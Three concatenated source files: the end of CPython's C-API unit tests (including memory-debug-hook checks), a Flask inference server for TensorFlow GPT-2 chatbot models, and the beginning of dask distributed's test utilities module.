self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned NULL '
br'without setting an error\n'
br'Python runtime state: initialized\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: _Py_CheckFunctionResult: '
br'a function returned a result '
br'with an error set\n'
br'Python runtime state: initialized\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
server.py
|
#!/usr/bin/env python3
import os
import sys
sys.path += [os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'src')]
sys.path += [os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import fire
import json
import os
import numpy as np
import tensorflow as tf
import tflex
import re
import time
import requests
import model, sample, encoder
import subprocess
from sanitizers.chatbot import sanitize as chat_sanitize
from flask import Flask, request, jsonify
from flask_apscheduler import APScheduler
from multiprocessing import Process
app = Flask(__name__)
class ModelController(object):
def __init__(self, models):
self.models = models
self.active_model_key = None
def acquire(self, key):
self.active_model_key = key
for k in self.models.keys():
if k != key:
self.models[k].close()
self.models[key].start_session()
return self.models[key]
class Model(object):
def __init__(self, model_name, restore_from, sanitize):
self.N_SAMPLES = 1
self.BATCH_SIZE = 1
self.model_name = model_name
self.restore_from = restore_from
self.do_sanitize = sanitize is not None
self.sanitize = sanitize
self.seed = None
self.no_cuda = False # just hard code this for now
self.inferences = []
self.enc = encoder.get_encoder(self.model_name)
self.hparams = model.default_hparams()
with open(os.path.join('models', self.model_name, 'hparams.json')) as f:
self.hparams.override_from_dict(json.load(f))
self.sess = None
self.sess_closed = False
        self.pattern = re.compile(r'[^\w]')
self.last_used = time.time()
self.model_expiration = 30 # seconds
def has_session(self):
return self.sess is not None and self.sess_closed is False
def start_session(self):
if self.has_session():
return
self.graph = tf.Graph()
config = tf.ConfigProto(device_count = {'GPU':0})
        self.sess = tflex.Session(graph=self.graph, config=config if self.no_cuda else None)
self.sess.__enter__()
self.context = tf.placeholder(tf.int32, [self.BATCH_SIZE, None])
np.random.seed(self.seed)
tf.set_random_seed(self.seed)
self.output = sample.sample_sequence(
hparams=self.hparams,
length=120,#self.hparams.n_ctx // 2,
context=self.context,
batch_size=1,
temperature=0.3, top_k=40, top_p=0.9, penalize=0.85
)
saver = tflex.Saver()
ckpt = tflex.latest_checkpoint(self.restore_from)
saver.restore(self.sess, ckpt)
def close(self):
if self.sess is not None:
print("CLEANING MODEL")
self.sess.close()
self.sess_closed = True
# del self.sess
# self.sess = None
else:
print("...not cleaning")
#self.inferences.clear()
def clean(self):
return
now = time.time()
print(f"self.sess exists {self.sess is not None}")
if self.last_used > 0 and self.last_used + self.model_expiration < now:
print(f"Cleaning up model {self.last_used} + {self.model_expiration} < {now}")
self.close()
else:
print(f"Not cleaning up model {self.last_used} + {self.model_expiration} < {now}")
def predict(self, raw_text):
print(f"-------INPUT------\n{raw_text}\n--------------\n")
self.start_session()
self.last_used = time.time()
print(f"last_used == {self.last_used}")
print(f"GPU_available: {tf.test.is_gpu_available()}")
if len(raw_text) > 1 and raw_text.endswith('\n'):
raw_text = raw_text[:-1]
context_tokens = self.enc.encode(raw_text)
self.inferences.append(raw_text)
generated = 0
print(f">>>> Getting {self.N_SAMPLES // self.BATCH_SIZE} samples")
for _ in range(self.N_SAMPLES // self.BATCH_SIZE):
out = self.sess.run(self.output, feed_dict={
self.context: [context_tokens for _ in range(self.BATCH_SIZE)]
})[:, len(context_tokens):]
print(f">>>> Returning {self.BATCH_SIZE}")
for i in range(self.BATCH_SIZE):
generated += 1
text = self.enc.decode(out[i])
return self.sanitize(text) if self.do_sanitize else text
def initializer(config_path="server_config.json"):
print(f"Initializing with {config_path}")
with open(config_path, 'r') as cfile:
data=cfile.read()
obj = json.loads(data)
obj['JOBS'] = [
{
'id': 'cleanup',
'func': 'server:_call_clean',
'trigger': 'interval',
'seconds': 10,
}
]
obj['SCHEDULER_API_ENABLED'] = True
print(f"Loaded obj {obj.keys()}")
models = {}
for item in obj['models']:
print(f"Loading {item}")
model = Model(item['model_name'],
item['restore_from'],
chat_sanitize if 'sanitizer' in item else None)
models[item['key']] = model
return (models, obj)
MODELS, CONFIG = fire.Fire(initializer)
CONTROLLER = ModelController(MODELS)
BASE_URL = f'http://{CONFIG["host"]}:{CONFIG["port"]}/'
def _infer(robj):
global MODELS
if robj is None:
return "UNKNOWN"
model_key = 'chatbot'
if 'model_key' in robj:
model_key = robj['model_key']
if model_key not in MODELS:
print(f"Could not find {model_key} in MODELS ({MODELS.keys()})")
return "UNKNOWN"
raw_text = robj['raw_text']
result = CONTROLLER.acquire(model_key).predict(raw_text)
return result
def _call_remote(url, robj):
r = requests.post(url, json=robj)
print(f'_call_remote: status_code == {r.status_code}')
print(r.status_code)
print(r.raw)
def _call_infer(robj):
    return _call_remote(f'{BASE_URL}invocations', robj)
@app.route('/invocations', methods=['POST'])
def infer():
return _infer(request.json)
@app.route('/ping')
def pong():
return "Pong!"
@app.route('/prime', methods=['POST'])
def prime():
robj = request.json
if "raw_text" not in robj:
robj["raw_text"] = "prime this bitch"
p = Process(target=_call_infer, args=(robj,))
p.start()
return f"primed {robj['model_key']}"
@app.route('/models/list')
def list_models():
robj = dict()
robj['models'] = list()
for k in MODELS.keys():
robj['models'].append({ 'model_key': k, 'num_inferences' : len(MODELS[k].inferences) })
robj['active_model'] = { 'key': CONTROLLER.active_model_key }
return jsonify(robj)
@app.route('/gputemp')
def gputemp():
result = subprocess.run(['nvidia-smi'], capture_output=True)
temps = []
    output = result.stdout.decode().split('\n')  # decode bytes rather than splitting the repr on a literal backslash-n
print(f'There are {len(output)} lines')
for line in output:
if "%" in line:
tmps = line.split(' ')
temps.append(tmps[4])
return jsonify(temps)
@app.route('/')
def hello():
return "<html><body><h1 style='color:#AAAA00;font-family:consolas'>hello friend</style></body></html>"
if __name__ == '__main__':
app.run(host=CONFIG['host'], port=CONFIG['port'], debug=CONFIG['debug'])
|
utils_test.py
|
import asyncio
import collections
import copy
import functools
import gc
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import warnings
import weakref
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from time import sleep
try:
import ssl
except ImportError:
ssl = None
import pytest
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from . import system
from .client import Client, _global_clients, default_client
from .comm import Comm
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
thread_state,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
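# Illustrative sketch (not part of the original test helpers): varying()
# returns the queued items one call at a time, re-raises any Exception
# instances, and raises IndexError once the list is exhausted.
def _example_varying_usage():
    func = varying([1, ValueError("boom"), 3])
    assert func() == 1
    try:
        func()
    except ValueError:
        pass
    assert func() == 3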
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
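# Illustrative sketch (not part of the original test helpers): readone() is
# meant to be awaited repeatedly from a coroutine; ``comm`` is assumed to be a
# connected Comm whose read() yields lists of messages.
async def _example_readone_usage(comm):
    messages = []
    while True:
        try:
            messages.append(await readone(comm))
        except CommClosedError:
            break
    return messages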
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
